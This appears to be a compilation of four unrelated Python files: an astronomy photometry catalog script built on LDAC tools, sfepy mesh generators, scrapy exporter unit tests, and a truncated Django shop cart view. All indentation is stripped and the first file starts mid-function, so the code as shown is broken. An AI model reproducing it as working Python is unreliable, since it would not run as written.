positions = [[340.82517,-9.59653,'faint_arc'],[340.8501,-9.58396,'main_knot_bright'],[340.84933,-9.58306,'lower_knot_bright'],[340.84933,-9.58306,'upper_knot_bright']]
tempfile = '/tmp/tmppos'
tempcat = '/tmp/tmpcat.cat'
tempconf = '/tmp/tmpconf.conf'
tmp = open(tempfile,'w')
tmp_ind = 0
for ps in positions:
tmp_ind += 1
tmp.write(str(tmp_ind) + ' ' + str(ps[0]) + ' ' + str(ps[1]) + '\n')
tmp.close()
tf = open(tempconf,'w')
tf.write(\
'COL_NAME = SeqNr\nCOL_TTYPE = LONG\nCOL_HTYPE = INT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
+ 'COL_NAME = ALPHA_J2000\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
+ 'COL_NAME = DELTA_J2000\nCOL_TTYPE = DOUBLE\nCOL_HTYPE = FLOAT\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 1\n#\n'\
)
#+ 'COL_NAME = OBJECT\nCOL_TTYPE = STRING\nCOL_HTYPE = STRING\nCOL_COMM = ""\nCOL_UNIT = ""\nCOL_DEPTH = 128\n'\
tf.close()
run('asctoldac -i ' + tempfile + ' -o ' + tempcat + ' -c ' + tempconf + ' -t STDTAB',[tempcat] )
return tempcat
def convert_spectra(specfile):
run("ldacrentab -i " + specfile.file + " -t OBJECTS STDTAB FIELDS NULL -o " + specfile.next(),[specfile.file])
run("ldacrenkey -i " + specfile.file + " -t STDTAB -k Ra ALPHA_J2000 Dec DELTA_J2000 Z z -o " + specfile.next(),[specfile.file])
run("ldaccalc -i " + specfile.file + " -t STDTAB -c '(Nr);' -k LONG -n SeqNr '' -o " + specfile.next(),[specfile.file] )
return specfile
from config_bonn import cluster, tag, arc, magnitude, filters, spectra,area
import sys, os, re
spec = 'yes'
arc_calc = 'no'
everything = 'no'
caltable = '/tmp/' + cluster + 'output.cat' #sys.argv[1]
caltablearc = '/tmp/' + cluster + 'output.arc.cat' #sys.argv[1]
#spectra = '/tmp/0911.cat' # 'M2243_spectra.cat' #sys.argv[2]
ppid = str(os.getppid())
calrename1 = '/tmp/cal1' #
#filters = ['W-J-B','W-J-V','W-C-RC','W-C-IC','W-S-Z+']
if spec == 'yes':
''' rename tables '''
##os.system("ldacrentab -i " + caltable + " -t OBJECTS STDTAB FIELDS NULL -o " + calrename1)
specfile = file_iter('/tmp/' + cluster + 'spec')
os.system('cp ' + spectra + ' ' + specfile.file)
specfile = convert_spectra(specfile)
print spectra
matchspec = '/tmp/' + cluster + 'matchspec'
matchspecfilt_first = '/tmp/' + cluster + 'matchspec.first.filt'
matchspecfilt = '/tmp/' + cluster + 'matchspec.filt'
print "match_neighbor.sh " + matchspec + " STDTAB " + specfile.file + " spec " + caltable + " data "
run("match_neighbor.sh " + matchspec + " STDTAB " + specfile.file + " spec " + caltable + " data ", [matchspec])
#print "ldacfilter -i " + matchspec + " -c '((z_spec != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchspecfilt
run("ldacfilter -i " + matchspec + " -c '((z_spec != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchspecfilt_first ,[matchspecfilt_first])
listcond = []
for filter in filters:
listcond.append('Flag_'+filter + "_data = 0)")
listcond.append('IMAFLAGS_ISO_'+filter + "_data = 0)")
#listcond.append('BackGr_'+filter + " > 0.00000001)")
filt= '(' + reduce(lambda x,y: '(' + x + ' AND (' + y + ')',listcond)
print filt
command = 'ldacfilter -i ' + matchspecfilt_first + ' -t STDTAB -o ' + matchspecfilt + ' -c "' + filt + ';" '
print command
run(command,[matchspecfilt])
#run("ldacfilter -i " + matchspecfilt_first + " -c '((N_00 = 0) AND (N_01 = 1));' -t STDTAB -o " + matchspecfilt ,[matchspecfilt])
#####command="ldacfilter -i " + outputtable + " -c '(OldSeqNr != 0);' -t STDTAB -o " + outputtablefilt
#specialobjs = special_objects()
#matchobj = '/tmp/matchobj'
matchobjfilt = '/tmp/' + cluster + 'matchobj.filt'
#run("match.sh " + matchobj + " STDTAB " + specialobjs + " obj " + caltable + " data ", [matchobj])
#run("ldacfilter -i " + matchobj + " -c '((ALPHA_J2000_obj != 0) AND (SeqNr_data != 0));' -t STDTAB -o " + matchobjfilt, [matchobjfilt])
#seqnrs = [87657,91866,91073,92484]
#conditionals = ['SeqNr=' + str(x) + ')' for x in seqnrs]
#filt= '(' + reduce(lambda x,y: '(' + x + ' OR (' + y + ')',conditionals)
#matchobjfilt = '/tmp/matchobj.filt'
#run('ldacfilter -i ' + caltablearc + ' -t STDTAB -o ' + matchobjfilt + ' -c "' + filt + ';" ')
''' make list of parameters to read out to photoz input file '''
mag_name = 'Mag_'
magerr_name = 'MAGERR_APER1'
dict_list = []
dict_list_obj = []
dict_list_nomat = []
print_list = []
print_list_obj = []
print_list_nomat = []
for filter in filters:
dict_list.append(mag_name + filter + '_data')
dict_list.append(magerr_name + '_' + filter + '_data')
print_list.append([mag_name + filter + '_data', magerr_name + '_' + filter + '_data'])
mag_name = 'MAG_SPEC_'
magerr_name = 'MAGERR_SPEC'
for filter in filters:
dict_list_obj.append(mag_name + filter )
dict_list_obj.append(magerr_name + '_' + filter )
print_list_obj.append([mag_name + filter , magerr_name + '_' + filter ])
mag_name = 'Mag_'
magerr_name = 'MAGERR_APER2'
for filter in filters:
dict_list_nomat.append(mag_name + filter )
dict_list_nomat.append(magerr_name + '_' + filter )
dict_list_nomat.append('Thresh_' + filter )
#dict_list_nomat.append('FLUX_AUTO_' + filter )
dict_list_nomat.append('Flag_' + filter )
dict_list_nomat.append('BackGr_' + filter )
dict_list_nomat.append('IMAFLAGS_ISO_' + filter )
print_list_nomat.append([mag_name + filter , magerr_name + '_' + filter, 'Thresh_' + filter, 'IMAFLAGS_ISO_' + filter ])
list_spec = dict_list + ['z_spec','ALPHA_J2000_spec','ALPHA_J2000_data','DELTA_J2000_spec','DELTA_J2000_data','SeqNr_spec','SeqNr_data']
list_obj = dict_list_obj + ['ALPHA_J2000','ALPHA_J2000','DELTA_J2000','DELTA_J2000','SeqNr']
list_nomat = dict_list_nomat + ['ALPHA_J2000','ALPHA_J2000','DELTA_J2000','DELTA_J2000','SeqNr']
keys_spec = reduce(lambda x,y: x + " " + y,list_spec)
keys_obj = reduce(lambda x,y: x + " " + y,list_obj)
keys_nomat = reduce(lambda x,y: x + " " + y,list_nomat)
os.system('rm /tmp/' + cluster + 'out.cat')
tempz = '/tmp/' + cluster + 'tempz'
if spec == 'yes':
out = open('/tmp/' + cluster + 'out.cat','w')
radec = '/tmp/' + cluster + 'radec.cat'
outradec = open(radec,'w')
''' write out spectra w/ magnitudes '''
run("ldactoasc -b -i " + matchspecfilt + " -t STDTAB -k " + keys_spec + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
#out = open('/tmp/out.cat','w')
for line in ll:
dict = match_list(line,list_spec)
stg = str(dict['SeqNr_data']) + " "
for pair in print_list:
if float(dict[pair[0]]) > 40: # see if object is detected
stg += "0\t999\t"
else:
err = dict[pair[1]]
if float(err) < 0.03: err = 0.03
stg += "\t%(var1).3f\t%(var2).3f\t" % {'var1':float(dict[pair[0]]),'var2':float(err)}
z_spec = "%(var1).3f" % {'var1':float(dict['z_spec'])}
if float(dict['z_spec']) != 0:
stg += "\t0\t" + z_spec + "\tComment\t" #+ dict['ALPHA_J2000_spec'] + " " + dict['ALPHA_J2000_data']
out.write(stg+ "\n")
outradec.write( dict['ALPHA_J2000_spec'] + " " + dict['DELTA_J2000_spec'] + '\n')
outradec.close()
os.system('mkreg.pl -xcol 0 -ycol 1 -c -rad 5 -wcs -colour red ' + radec)
if arc_calc == 'yes':
''' write out objects w/ magnitudes '''
run("ldactoasc -b -i " + caltablearc + " -t STDTAB -k " + keys_obj + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
for line in ll:
dict = match_list(line,list_obj)
stg = str(dict['SeqNr']) + "\t"
for pair in print_list_obj:
if float(dict[pair[0]]) > 40: # see if object is detected
stg += " 0 999"
else:
err = float(dict[pair[1]])
if err < 0.05: err = 0.05
stg += "\t" + str(dict[pair[0]]) + "\t" + str(err) + "\t"
#out.write(stg+ '\n')
if everything == 'yes':
listcond = []
for filter in filters:
listcond.append('Flag_'+filter + " = 0)")
#listcond.append('BackGr_'+filter + " > 0.00000001)")
filt= '(' + reduce(lambda x,y: '(' + x + ' AND (' + y + ')',listcond)
print filt
command = 'ldacfilter -i ' + caltable + ' -t STDTAB -o /tmp/' + cluster + 'caltable -c "' + filt + ';" '
print command
print '\n\n\n\n'
#os.system(command)
#skipping FILTER!!!!
os.system('cp ' + caltable + ' /tmp/' + cluster + 'caltable')
ofile = '/tmp/' + cluster + 'out.cat'
out = open(ofile,'w')
''' write out objects w/ magnitudes '''
run("ldactoasc -b -i /tmp/" + cluster + "caltable -t STDTAB -k " + keys_nomat + " > " + tempz, [tempz])
ll = open(tempz,'r').readlines()
for line in ll:
dict = match_list(line,list_nomat)
stg = str(dict['SeqNr']) + "\t"
import math
for pair in print_list_nomat:
detect_mag = (2.5 * math.log10(area) + float(dict[pair[2]]))
flag = int(dict[pair[3]])
if flag != 0: # if something is wrong with photometry, leave out constraint
stg += " 0 999"
elif float(dict[pair[0]]) > detect_mag: # see if object is detected, if not put detection limit
#stg += str(detect_mag) + " -1 "
stg += "\t%(var1).3f\t%(var2).3f\t" % {'var1':detect_mag - 0.75,'var2':-1}
else:
err = float(dict[pair[1]])
if err < 0.05: err = 0.05
stg += "\t" + str(dict[pair[0]]) + "\t" + str(err) + "\t"
#stg += "\t" + dict['ALPHA_J2000'] + " " + dict['DELTA_J2000'] + ' ' + dict['Flag_W-C-IC']
out.write(stg+ '\n')
out.close()
|
|
from sfepy.base.base import *
from sfepy.base.progressbar import MyBar
from sfepy.linalg import cycle
from sfepy.fem import Mesh
def gen_block_mesh(dims, shape, centre, name='block'):
"""Generate a 2D or 3D block mesh. The dimension is determined by the
lenght of the shape argument.
Parameters
----------
dims : array of 2 or 3 floats
Dimensions of the block.
shape : array of 2 or 3 ints
Shape (counts of nodes in x, y, z) of the block mesh.
centre : array of 2 or 3 floats
Centre of the block.
name : string
Mesh name.
Returns
-------
mesh : Mesh instance
"""
dim = shape.shape[0]
centre = centre[:dim]
dims = dims[:dim]
x0 = centre - 0.5 * dims
dd = dims / (shape - 1)
grid = nm.zeros( shape, dtype = nm.int32 )
n_nod = nm.prod( shape )
coors = nm.zeros( (n_nod, dim), dtype = nm.float64 )
bar = MyBar( " nodes:" )
bar.init( n_nod )
for ii, ic in enumerate( cycle( shape ) ):
grid[tuple(ic)] = ii
coors[ii] = x0 + ic * dd
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
n_el = nm.prod( shape - 1 )
mat_id = nm.zeros( (n_el,), dtype = nm.int32 )
if (dim == 2):
conn = nm.zeros( (n_el, 4), dtype = nm.int32 )
bar = MyBar( " elements:" )
bar.init( n_el )
for ii, (ix, iy) in enumerate( cycle( shape - 1 ) ):
conn[ii,:] = [grid[ix ,iy], grid[ix+1,iy ],
grid[ix+1,iy+1], grid[ix ,iy+1]]
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
desc = '2_4'
else:
conn = nm.zeros( (n_el, 8), dtype = nm.int32 )
bar = MyBar( " elements:" )
bar.init( n_el )
for ii, (ix, iy, iz) in enumerate( cycle( shape - 1 ) ):
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,iy+1,iz ], grid[ix ,iy+1,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,iy+1,iz+1], grid[ix ,iy+1,iz+1]]
if not (ii % 100):
bar.update( ii )
bar.update(ii + 1)
desc = '3_8'
mesh = Mesh.from_data(name, coors, None, [conn], [mat_id], [desc])
return mesh
def gen_cylinder_mesh(dims, shape, centre, axis='x', force_hollow=False,
is_open=False, open_angle=0.0, non_uniform=False,
name='cylinder'):
"""Generate a cylindrical mesh along an axis. Its cross-section can be
ellipsoidal.
Parameters
----------
axis: one of 'x', 'y', 'z'
The axis of the cylinder.
dims : array of 5 floats
Dimensions of the cylinder: inner surface semi-axes a1, b1, outer
surface semi-axes a2, b2, length.
shape : array of 3 ints
Shape (counts of nodes in radial, circumferential and longitudinal
directions) of the cylinder mesh.
centre : array of 3 floats
Centre of the cylinder.
force_hollow : boolean
Force hollow mesh even if inner radii a1 = b1 = 0.
is_open : boolean
Generate an open cylinder segment.
open_angle : float
Opening angle in radians.
non_uniform : boolean
If True, space the mesh nodes in radial direction so that the element
volumes are (approximately) the same, making thus the elements towards
the outer surface thinner.
name : string
Mesh name.
Returns
-------
mesh : Mesh instance
"""
a1, b1, a2, b2, length = dims
nr, nfi, nl = shape
origin = centre - nm.array([0.5 * length, 0.0, 0.0])
da = (a2 - a1) / (nr - 1)
db = (b2 - b1) / (nr - 1)
dfi = 2.0 * (nm.pi - open_angle) / nfi
if is_open:
nnfi = nfi + 1
else:
nnfi = nfi
is_hollow = force_hollow or not (max(abs(a1), abs(b1)) < 1e-15)
if is_hollow:
mr = 0
else:
mr = (nnfi - 1) * nl
grid = nm.zeros((nr, nnfi, nl), dtype=nm.int32)
n_nod = nr * nnfi * nl - mr
coors = nm.zeros((n_nod, 3), dtype=nm.float64)
angles = nm.linspace(open_angle, open_angle+(nfi)*dfi, nfi+1)
xs = nm.linspace(0.0, length, nl)
if non_uniform:
ras = nm.zeros((nr,), dtype=nm.float64)
rbs = nm.zeros_like(ras)
advol = (a2**2 - a1**2) / (nr - 1)
bdvol = (b2**2 - b1**2) / (nr - 1)
ras[0], rbs[0] = a1, b1
for ii in range(1, nr):
ras[ii] = nm.sqrt(advol + ras[ii-1]**2)
rbs[ii] = nm.sqrt(bdvol + rbs[ii-1]**2)
else:
ras = nm.linspace(a1, a2, nr)
rbs = nm.linspace(b1, b2, nr)
## print dfi * 180.0 / nm.pi
## print angles * 180.0 / nm.pi
## print xs
## print ras
## print rbs
# This is 3D only...
bar = MyBar( " nodes:" )
bar.init( n_nod )
ii = 0
for ix in range(nr):
a, b = ras[ix], rbs[ix]
for iy, fi in enumerate(angles[:nnfi]):
# print iy, fi * 180.0 / nm.pi
for iz, x in enumerate(xs):
## print ix, iy, iz, ii
grid[ix,iy,iz] = ii
coors[ii] = origin + [x, a * nm.cos(fi), b * nm.sin(fi)]
if not (ii % 100):
bar.update( ii )
ii += 1
if not is_hollow and (ix == 0):
if iy > 0:
grid[ix,iy,iz] = grid[ix,0,iz]
ii -= 1
print
assert_(ii == n_nod)
n_el = (nr - 1) * nnfi * (nl - 1)
conn = nm.zeros((n_el, 8), dtype=nm.int32)
bar = MyBar( " elements:" )
bar.init(n_el)
ii = 0
for (ix, iy, iz) in cycle([nr-1, nnfi, nl-1]):
# print ii, ix, iy, iz
if iy < (nnfi - 1):
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,iy+1,iz ], grid[ix ,iy+1,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,iy+1,iz+1], grid[ix ,iy+1,iz+1]]
ii += 1
elif not is_open:
conn[ii,:] = [grid[ix ,iy ,iz ], grid[ix+1,iy ,iz ],
grid[ix+1,0,iz ], grid[ix ,0,iz ],
grid[ix ,iy ,iz+1], grid[ix+1,iy ,iz+1],
grid[ix+1,0,iz+1], grid[ix ,0,iz+1]]
ii += 1
if not (ii % 100):
bar.update( ii )
print
mat_id = nm.zeros( (n_el,), dtype = nm.int32 )
desc = '3_8'
## print n_nod, n_el, conn.max()
assert_(n_nod == (conn.max() + 1))
if axis == 'z':
coors = coors[:,[1,2,0]]
elif axis == 'y':
coors = coors[:,[2,0,1]]
mesh = Mesh.from_data(name, coors, None, [conn], [mat_id], [desc])
return mesh
def main():
mesh = gen_block_mesh(nm.array((1.0, 2.0, 3.0)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
name='')
mesh.write('0.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=False, open_angle = 0.0,
name='')
mesh.write('1.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.0,
name='')
mesh.write('2.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((1.0, 1.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5,
name='')
mesh.write('3.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 2.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=False, open_angle = 0.0,
name='')
mesh.write('4.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5,
name='')
mesh.write('5.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.0, 0.0, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5, non_uniform=True,
name='')
mesh.write('6.mesh', io = 'auto' )
mesh = gen_cylinder_mesh(nm.array((0.5, 0.5, 1.0, 2.0, 3)),
nm.array((10,10,10)), nm.array((1.0, 2.0, 3.0)),
is_open=True, open_angle = 0.5, non_uniform=True,
name='')
mesh.write('7.mesh', io = 'auto' )
if __name__ == '__main__':
main()
|
|
import unittest, json
from io import BytesIO
from six.moves import cPickle as pickle
import lxml.etree
import re
from scrapy.item import Item, Field
from scrapy.utils.python import str_to_unicode
from scrapy.contrib.exporter import BaseItemExporter, PprintItemExporter, \
PickleItemExporter, CsvItemExporter, XmlItemExporter, JsonLinesItemExporter, \
JsonItemExporter, PythonItemExporter
class TestItem(Item):
name = Field()
age = Field()
class BaseItemExporterTest(unittest.TestCase):
def setUp(self):
self.i = TestItem(name=u'John\xa3', age='22')
self.output = BytesIO()
self.ie = self._get_exporter()
def _get_exporter(self, **kwargs):
return BaseItemExporter(**kwargs)
def _check_output(self):
pass
def _assert_expected_item(self, exported_dict):
for k, v in exported_dict.items():
exported_dict[k] = str_to_unicode(v)
self.assertEqual(self.i, exported_dict)
def test_export_item(self):
self.ie.start_exporting()
try:
self.ie.export_item(self.i)
except NotImplementedError:
if self.ie.__class__ is not BaseItemExporter:
raise
self.ie.finish_exporting()
self._check_output()
def test_serialize_field(self):
self.assertEqual(self.ie.serialize_field( \
self.i.fields['name'], 'name', self.i['name']), 'John\xc2\xa3')
self.assertEqual( \
self.ie.serialize_field(self.i.fields['age'], 'age', self.i['age']), '22')
def test_fields_to_export(self):
ie = self._get_exporter(fields_to_export=['name'])
self.assertEqual(list(ie._get_serialized_fields(self.i)), [('name', 'John\xc2\xa3')])
ie = self._get_exporter(fields_to_export=['name'], encoding='latin-1')
name = list(ie._get_serialized_fields(self.i))[0][1]
assert isinstance(name, str)
self.assertEqual(name, 'John\xa3')
def test_field_custom_serializer(self):
def custom_serializer(value):
return str(int(value) + 2)
class CustomFieldItem(Item):
name = Field()
age = Field(serializer=custom_serializer)
i = CustomFieldItem(name=u'John\xa3', age='22')
ie = self._get_exporter()
self.assertEqual(ie.serialize_field(i.fields['name'], 'name', i['name']), 'John\xc2\xa3')
self.assertEqual(ie.serialize_field(i.fields['age'], 'age', i['age']), '24')
class PythonItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PythonItemExporter(**kwargs)
def test_nested_item(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(type(exported), dict)
self.assertEqual(exported, {'age': {'age': {'age': '22', 'name': u'Joseph'}, 'name': u'Maria'}, 'name': 'Jesus'})
self.assertEqual(type(exported['age']), dict)
self.assertEqual(type(exported['age']['age']), dict)
def test_export_list(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=[i1])
i3 = TestItem(name=u'Jesus', age=[i2])
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(exported, {'age': [{'age': [{'age': '22', 'name': u'Joseph'}], 'name': u'Maria'}], 'name': 'Jesus'})
self.assertEqual(type(exported['age'][0]), dict)
self.assertEqual(type(exported['age'][0]['age'][0]), dict)
def test_export_item_dict_list(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = dict(name=u'Maria', age=[i1])
i3 = TestItem(name=u'Jesus', age=[i2])
ie = self._get_exporter()
exported = ie.export_item(i3)
self.assertEqual(exported, {'age': [{'age': [{'age': '22', 'name': u'Joseph'}], 'name': u'Maria'}], 'name': 'Jesus'})
self.assertEqual(type(exported['age'][0]), dict)
self.assertEqual(type(exported['age'][0]['age'][0]), dict)
class PprintItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PprintItemExporter(self.output, **kwargs)
def _check_output(self):
self._assert_expected_item(eval(self.output.getvalue()))
class PickleItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return PickleItemExporter(self.output, **kwargs)
def _check_output(self):
self._assert_expected_item(pickle.loads(self.output.getvalue()))
def test_export_multiple_items(self):
i1 = TestItem(name='hello', age='world')
i2 = TestItem(name='bye', age='world')
f = BytesIO()
ie = PickleItemExporter(f)
ie.start_exporting()
ie.export_item(i1)
ie.export_item(i2)
ie.finish_exporting()
f.seek(0)
self.assertEqual(pickle.load(f), i1)
self.assertEqual(pickle.load(f), i2)
class CsvItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return CsvItemExporter(self.output, **kwargs)
def assertCsvEqual(self, first, second, msg=None):
csvsplit = lambda csv: [sorted(re.split(r'(,|\s+)', line))
for line in csv.splitlines(True)]
return self.assertEqual(csvsplit(first), csvsplit(second), msg)
def _check_output(self):
self.assertCsvEqual(self.output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n')
def test_header(self):
output = BytesIO()
ie = CsvItemExporter(output, fields_to_export=self.i.fields.keys())
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n')
output = BytesIO()
ie = CsvItemExporter(output, fields_to_export=['age'])
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age\r\n22\r\n')
output = BytesIO()
ie = CsvItemExporter(output)
ie.start_exporting()
ie.export_item(self.i)
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), 'age,name\r\n22,John\xc2\xa3\r\n22,John\xc2\xa3\r\n')
output = BytesIO()
ie = CsvItemExporter(output, include_headers_line=False)
ie.start_exporting()
ie.export_item(self.i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), '22,John\xc2\xa3\r\n')
def test_join_multivalue(self):
class TestItem2(Item):
name = Field()
friends = Field()
i = TestItem2(name='John', friends=['Mary', 'Paul'])
output = BytesIO()
ie = CsvItemExporter(output, include_headers_line=False)
ie.start_exporting()
ie.export_item(i)
ie.finish_exporting()
self.assertCsvEqual(output.getvalue(), '"Mary,Paul",John\r\n')
class XmlItemExporterTest(BaseItemExporterTest):
def _get_exporter(self, **kwargs):
return XmlItemExporter(self.output, **kwargs)
def assertXmlEquivalent(self, first, second, msg=None):
def xmltuple(elem):
children = list(elem.iterchildren())
if children:
return [(child.tag, sorted(xmltuple(child)))
for child in children]
else:
return [(elem.tag, [(elem.text, ())])]
def xmlsplit(xmlcontent):
doc = lxml.etree.fromstring(xmlcontent)
return xmltuple(doc)
return self.assertEqual(xmlsplit(first), xmlsplit(second), msg)
def _check_output(self):
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n<items><item><age>22</age><name>John\xc2\xa3</name></item></items>'
self.assertXmlEquivalent(self.output.getvalue(), expected_value)
def test_multivalued_fields(self):
output = BytesIO()
item = TestItem(name=[u'John\xa3', u'Doe'])
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(item)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n<items><item><name><value>John\xc2\xa3</value><value>Doe</value></name></item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
def test_nested_item(self):
output = BytesIO()
i1 = TestItem(name=u'foo\xa3hoo', age='22')
i2 = TestItem(name=u'bar', age=i1)
i3 = TestItem(name=u'buz', age=i2)
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(i3)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n'\
'<items><item>'\
'<age>'\
'<age>'\
'<age>22</age>'\
'<name>foo\xc2\xa3hoo</name>'\
'</age>'\
'<name>bar</name>'\
'</age>'\
'<name>buz</name>'\
'</item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
def test_nested_list_item(self):
output = BytesIO()
i1 = TestItem(name=u'foo')
i2 = TestItem(name=u'bar')
i3 = TestItem(name=u'buz', age=[i1, i2])
ie = XmlItemExporter(output)
ie.start_exporting()
ie.export_item(i3)
ie.finish_exporting()
expected_value = '<?xml version="1.0" encoding="utf-8"?>\n'\
'<items><item>'\
'<age>'\
'<value><name>foo</name></value>'\
'<value><name>bar</name></value>'\
'</age>'\
'<name>buz</name>'\
'</item></items>'
self.assertXmlEquivalent(output.getvalue(), expected_value)
class JsonLinesItemExporterTest(BaseItemExporterTest):
_expected_nested = {'name': u'Jesus', 'age': {'name': 'Maria', 'age': {'name': 'Joseph', 'age': '22'}}}
def _get_exporter(self, **kwargs):
return JsonLinesItemExporter(self.output, **kwargs)
def _check_output(self):
exported = json.loads(self.output.getvalue().strip())
self.assertEqual(exported, dict(self.i))
def test_nested_item(self):
i1 = TestItem(name=u'Joseph', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
self.ie.start_exporting()
self.ie.export_item(i3)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
self.assertEqual(exported, self._expected_nested)
def test_extra_keywords(self):
self.ie = self._get_exporter(sort_keys=True)
self.test_export_item()
self._check_output()
self.assertRaises(TypeError, self._get_exporter, foo_unknown_keyword_bar=True)
class JsonItemExporterTest(JsonLinesItemExporterTest):
_expected_nested = [JsonLinesItemExporterTest._expected_nested]
def _get_exporter(self, **kwargs):
return JsonItemExporter(self.output, **kwargs)
def _check_output(self):
exported = json.loads(self.output.getvalue().strip())
self.assertEqual(exported, [dict(self.i)])
def test_two_items(self):
self.ie.start_exporting()
self.ie.export_item(self.i)
self.ie.export_item(self.i)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
self.assertEqual(exported, [dict(self.i), dict(self.i)])
def test_nested_item(self):
i1 = TestItem(name=u'Joseph\xa3', age='22')
i2 = TestItem(name=u'Maria', age=i1)
i3 = TestItem(name=u'Jesus', age=i2)
self.ie.start_exporting()
self.ie.export_item(i3)
self.ie.finish_exporting()
exported = json.loads(self.output.getvalue())
expected = {'name': u'Jesus', 'age': {'name': 'Maria', 'age': dict(i1)}}
self.assertEqual(exported, [expected])
class CustomItemExporterTest(unittest.TestCase):
def test_exporter_custom_serializer(self):
class CustomItemExporter(BaseItemExporter):
def serialize_field(self, field, name, value):
if name == 'age':
return str(int(value) + 1)
else:
return super(CustomItemExporter, self).serialize_field(field, \
name, value)
i = TestItem(name=u'John', age='22')
ie = CustomItemExporter()
self.assertEqual( \
ie.serialize_field(i.fields['name'], 'name', i['name']), 'John')
self.assertEqual(
ie.serialize_field(i.fields['age'], 'age', i['age']), '23')
if __name__ == '__main__':
unittest.main()
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.contrib import messages
from django.http import HttpResponseBadRequest, JsonResponse
from django.shortcuts import redirect
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.generic import FormView, TemplateView
from shop.modifiers.pool import cart_modifiers_pool
from shopit.forms import shop as shop_forms
from shopit.models.cart import Cart, CartItem
from shopit.models.modifier import DiscountCode
from shopit.models.order import Order
class CartObjectMixin(object):
"""
Cart object mixin adds cart, cart items and watch items to the context.
Resets the values from `extra` dict that are populated by the checkout.
"""
def dispatch(self, request, *args, **kwargs):
self.cart = Cart.objects.get_or_create_from_request(request)
for key in ['payment_modifier', 'shipping_modifier', 'annotation']:
self.cart.extra.pop(key, None)
self.update_cart()
self.cart.save()
return super(CartObjectMixin, self).dispatch(request, *args, **kwargs)
def update_cart(self):
self.cart._dirty = True
self.cart._cached_cart_items = None
self.cart.update(self.request)
def get_cart_data(self):
return {
'cart': self.cart,
'cart_items': self.cart._cached_cart_items,
'watch_items': CartItem.objects.filter_watch_items(self.cart, self.request),
}
def get_context_data(self, **kwargs):
context = super(CartObjectMixin, self).get_context_data(**kwargs)
context.update(self.get_cart_data())
return context
class CartView(CartObjectMixin, FormView):
"""
Cart view displays the cart and handles updating item's quantity,
deleting the cart and adding modifier codes to the cart.
"""
empty = False
form_class = shop_forms.CartDiscountCodeForm
template_name = 'shopit/shop/cart.html'
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
if self.empty:
cart = Cart.objects.get_from_request(request)
for item in cart.items.all():
